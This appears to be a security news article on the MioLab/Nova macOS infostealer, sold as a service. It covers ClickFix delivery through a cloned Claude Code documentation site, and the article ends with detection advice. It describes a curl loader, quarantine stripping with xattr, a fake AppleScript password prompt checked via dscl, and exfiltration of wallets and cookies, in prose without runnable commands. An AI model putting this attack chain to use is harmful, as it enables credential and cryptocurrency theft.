MioLab Stealer for macOS Gains ClickFix Delivery, Wallet Theft, and Team API Tools
Key Takeaways MioLab, also known as Nova, has rapidly evolved into a sophisticated Malware-as-a-Service (MaaS) platform targeting macOS users, actively advertised on Russian-speaking forums. The...
Key Takeaways
- MioLab, also known as Nova, has rapidly evolved into a sophisticated Malware-as-a-Service (MaaS) platform targeting macOS users, actively advertised on Russian-speaking forums.
- The stealer now includes a “ClickFix” social engineering technique that leverages fake developer sites to trick victims into executing malicious Terminal commands, bypassing macOS Gatekeeper.
- Recent updates to MioLab’s capabilities include enhanced hardware wallet extraction, Safari cookie grabbing, Apple Notes decryption, and a full Team API for automated payload generation and data exfiltration.
- MioLab’s operators are linked to a broader cybercrime infrastructure, utilizing bulletproof hosting from FEMO IT Solutions Ltd. (Defhost) and repurposing old C2 domains for new phishing campaigns.
MioLab, an advanced macOS infostealer also identified as Nova, has solidified its position as a leading Malware-as-a-Service (MaaS) platform. This sophisticated threat is specifically engineered to compromise Apple systems, signaling a significant shift in the cybersecurity landscape where macOS is no longer considered a low-risk environment.
Table Of Content
The malware’s prevalence on Russian-speaking underground forums underscores a growing trend where cybercriminals increasingly target macOS users. As Apple’s market share expands among high-value individuals such as software engineers, corporate executives, and cryptocurrency investors, Macs present an increasingly lucrative attack surface for threat actors.
MioLab operates through a user-friendly web panel and deploys a compact C-language payload, measuring approximately 100 KB. This minimal file size aids in evading detection by conventional signature-based antivirus solutions. The stealer is architecturally versatile, supporting both Intel x86-64 and Apple Silicon ARM64, and is compatible with macOS versions ranging from Sierra to Tahoe.
The malware’s extensive capabilities include the theft of browser credentials, draining of cryptocurrency wallets, harvesting of password manager data, and exfiltration of files. A premium module further extends its reach to hardware wallets like Ledger and Trezor, enabling the theft of critical 24-word BIP39 recovery seed phrases.
Analysts at LevelBlue have closely monitored MioLab’s rapid evolution, noting an unusually accelerated development pace for an infostealer. Reviewing changelogs up to February 2026, researchers confirmed substantial enhancements. These include a re-engineered hardware wallet extraction module, the ability to decrypt Apple Notes directly on the compromised device, a fully functional Safari cookie grabber, and the integration of a comprehensive Team API.
This newly implemented Team API significantly enhances operational efficiency for criminal groups, allowing them to programmatically generate payloads and download exfiltrated logs without direct interaction with the web panel. Furthermore, the platform incorporates Telegram bot binding, providing real-time victim notifications to organized cybercriminal affiliates, often referred to as “traffers.”
Investigations into MioLab’s infrastructure reveal that its operators manage a broader cybercrime ecosystem. The malware’s administrative panel, previously hosted at playavalon[.]org, has been repurposed to facilitate an Ethereum token airdrop phishing campaign, effectively converting residual traffic from old command-and-control indicators into new fraudulent activities.
Both MioLab’s operations and the associated phishing campaigns have been traced back to FEMO IT Solutions Ltd., a bulletproof hosting provider operating under the Defhost brand. This provider is known for sheltering various malware families, offering a protective layer against law enforcement intervention.
ClickFix Delivery: Social Engineering Through the Terminal
A particularly insidious addition to MioLab’s arsenal is its “ClickFix” infection chain. This technique employs social engineering to persuade victims into voluntarily executing malicious commands within their macOS Terminal. The malware’s panel features a one-click utility where operators simply input their server credentials, and the system automatically generates a Terminal payload. This payload is then disseminated through deceptive channels such as fake CAPTCHA pages or meticulously cloned developer portals.
Shortly before this publication, researcher Marcelo Rivero uncovered an active malvertising campaign distributing MioLab through a highly convincing replica of the Claude Code documentation site. This legitimate command-line AI tool by Anthropic was mimicked to target specific victims.
The campaign was precisely engineered to ensnare high-value targets, particularly developers who are accustomed to executing commands in the Terminal. For Windows users, the cloned site presented entirely legitimate installation instructions, appearing visually authentic. However, macOS users were served a ClickFix-style payload.
The initial stage of the attack involved a Base64-encoded URL. Once decoded and executed, this launched a curl loader designed to retrieve the Mach-O payload, deposit it into the /tmp directory, and then run an xattr -c command. This command strips Apple’s Quarantine attribute, effectively bypassing Gatekeeper’s security protections.
After circumventing Gatekeeper, the malware forcibly closed any open Terminal windows and presented a fraudulent System Preferences password dialog via AppleScript. This tactic aimed to trick users into divulging their login credentials. The captured password was subsequently validated against the local directory service using the dscl utility. Upon successful verification, MioLab initiated a comprehensive data collection process, gathering browser cookies, stored passwords, cryptocurrency wallet files, Apple Notes, Telegram session data, and documents from the user’s Desktop and Downloads folders. All collected data was then compressed into a ZIP archive and uploaded to the attacker’s command-and-control server.
What You Should Do
- Exercise Caution with Password Prompts: Users should be highly suspicious of unexpected password dialogs, especially after installing or interacting with newly downloaded applications. Always verify the legitimacy of such prompts.
- Monitor Sensitive System Utilities: Security teams should implement strict monitoring or blocking policies for sensitive system utilities like
dscl,osascript, andsystem_profilerwhen invoked by unsigned applications. - Audit Access to Critical Directories: Regularly audit access to browser profile directories and the macOS Keychain file (
login.keychain-db) to detect unauthorized activity. - Block Malicious Domains: Implement network-level blocking for known malicious domains, including
socifiapp[.]com, to prevent communication with C2 servers. - Inspect Suspicious Network Traffic: Flag and investigate any suspicious
curlPOST requests directed to external APIs, as these may indicate data exfiltration attempts.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.